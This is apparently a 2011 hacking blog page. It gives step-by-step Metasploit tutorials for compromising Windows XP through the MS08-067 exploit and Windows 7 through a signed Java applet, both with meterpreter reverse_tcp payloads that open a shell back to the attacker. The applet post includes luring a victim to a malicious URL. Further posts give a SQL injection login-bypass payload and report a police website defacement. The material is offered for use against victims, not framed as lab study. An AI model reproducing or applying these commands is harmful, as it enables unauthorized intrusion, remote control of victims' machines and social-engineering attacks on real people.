Tuesday, 20 December 2011

How to hack windows xp (sp1,sp2,sp3) using metasploit

In this article I will be showing you how to use Ms08_067_Netapi exploit in an Unpatched windows xp to gain access to the machine. The original name of the exploit is "Microsoft Server Service Relative Path Stack Corruption", This exploits helps bypassing NX on various operating systems and service packs, Before we jump into the actual exploitation process, i would suggest you taking some time looking at the exploit code here.

Requirements

1. Bactrack 5 
2. Windows XP 

How to hack windows xp using metasploit


Step 1 - First of all turn on your Backtrack 5 virtual machine .

Step 2 - Next on your console type "msfconsole", This will load the metasploit framework.

 Step 3 - Next type "use windows/smb/ms08_067_netapi" in the console.

 Step 4 - Now after the exploit has been setup, you would need to enter the RHOST, RHOST refers to the iP address of the victim. You can get the windows host iP by issuing the "ipconfig" command in the command prompt.

 Step 5 - Once the exploit is setup, it's time to setup a payload, In this case we will use a windows/meterpreter/reverse_tcp command in the shell, Next you need to set the proper lhost <attacker ip address> by issuing the command "lhost <iP address>".

  Step 6 - Next issue the command "show options" to check to see if every thing is setup fine.



Step 7 - Once you are done with the assessment, just type "exploit" in the console


If u r blind successfully exploit than u r got meterpreter shell in u r backtrack pc



                                                   - - - - - VIDEO TUTORIAL - - - - -


If you have any questions, Feel free to ask.
:D

Related post : 

Tuesday, 13 December 2011

Hack windows 7 pc using metasploit (JAVA APPLET METHOD)


Hack windows 7
Requirement : 

1.Metasploit Framework
2.Operating System(I'm recommend using Linux OS or Backtrack 5)

Step By Step :

1. Open your msfconsole and find java_signed_applet exploit with command search java_signed_applet. If you can't find it, try to update your Metasploit Framework to newer version with msfupdate command. If the exploit was available, let's continue with picture below.


use exploit/multi/browser/java_signed_applet ---> load the java_signed_applet exploit set payload windows/meterpreter/reverse_tcp ---> set the reverse_tcp meterpreter to connect back to our machine

2.we need to add some required switches to make an attack successful.but if you want to view available switches, you can type show options.



set srvhost 192.168.1.103 ---> host that served the exploit
set srvport 80 ---> I'm choose 80, because it's really great for computer social engineering especially social engineering via website
set uripath / ---> the URL format to send to victim (http://192.168.1.103) set lhost 192.168.1.103 ---> connect back address when successfully perform attack set lport 443 ---> port used to connect back to our machine
set LHOST 192.168.1.103 ----> host that served the exploit for payload


3.exploit

now an URL you should give to your victim http://192.168.1.103/

4.When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.

5. After victim open the malicious URL and click RUN

Press CTRL + C to stop the process or you can directly run sessions -l to view the active sessions.

Now u r got meterpreter shell in u r backtrack PC



                                                  - - - - - VIDEO TUTORIAL - - - - -



Related post : 

Sunday, 27 November 2011

what is sql injection ?


SQL Injection: What is it?

SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database.

In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.

SQL Injection: An In-depth Explanation
Web applications allow legitimate website visitors to submit and retrieve data to/from a database over the Internet using their preferred web browser. Databases are central to modern websites – they store data needed for websites to deliver specific content to visitors and render information to customers, suppliers, employees and a host of stakeholders. User credentials, financial and payment information, company statistics may all be resident within a database and accessed by legitimate users through off-the-shelf and custom web applications. Web applications and databases allow you to regularly run your business.
SQL Injection is the hacking technique which attempts to pass SQL commands (statements) through a web application for execution by the backend database. If not sanitized properly, web applications may result in SQL Injection attacks that allow hackers to view information from the database and/or even wipe it out.
Such features as login pages, support and product request forms, feedback forms, search pages, shopping carts and the general delivery of dynamic content, shape modern websites and provide businesses with the means necessary to communicate with prospects and customers. These website features are all examples of web applications which may be either purchased off-the-shelf or developed as bespoke programs.
These website features are all susceptible to SQL Injection attacks which arise because the fields available for user input allow SQL statements to pass through and query the database directly.

Example of a SQLInjection Attack

Here is a sample basic HTML form with two inputs, login and password.

<form method="post" action="http://testasp.vulnweb.com/login.asp">
<input name="tfUName" type="text" id="tfUName">
<input name="tfUPass" type="password" id="tfUPass">
</form>

The easiest way for the login.asp to work is by building a database query that looks like this:

SELECT id
FROM logins
WHERE username = '$username'
AND password = '$password’

If the variables $username and $password are requested directly from the user's input, this can easily be compromised. Suppose that we gave "Joe" as a username and that the following string was provided as a password: anything' OR 'x'='x

SELECT id
FROM logins
WHERE username = 'Joe'
AND password = 'anything' OR 'x'='x'

As the inputs of the web application are not properly sanitised, the use of the single quotes has turned the WHERE SQL command into a two-component clause.

The 'x'='x' part guarantees to be true regardless of what the first part contains.

This will allow the attacker to bypass the login form without actually knowing a valid username / password combination!

SQL INJECTION CHEAT SHEET

LIve Example of a SQLInjection Attack

http://www.youtube.com/watch?v=WGkntart6WI&feature=related

Sunday, 20 November 2011

Maharashtra Highway Police website hacked


Not only International Law Enforcement and Police Under Hacker's attack, Even our Local Police websites and Database also become of Victim of breaches mostly once a day. A hacker With name "powerin10" take responsibility to hack Maharashtra Highway Police website. A mirror of this hack is available here.  Hacker is member of Bangladesh Cyber Army.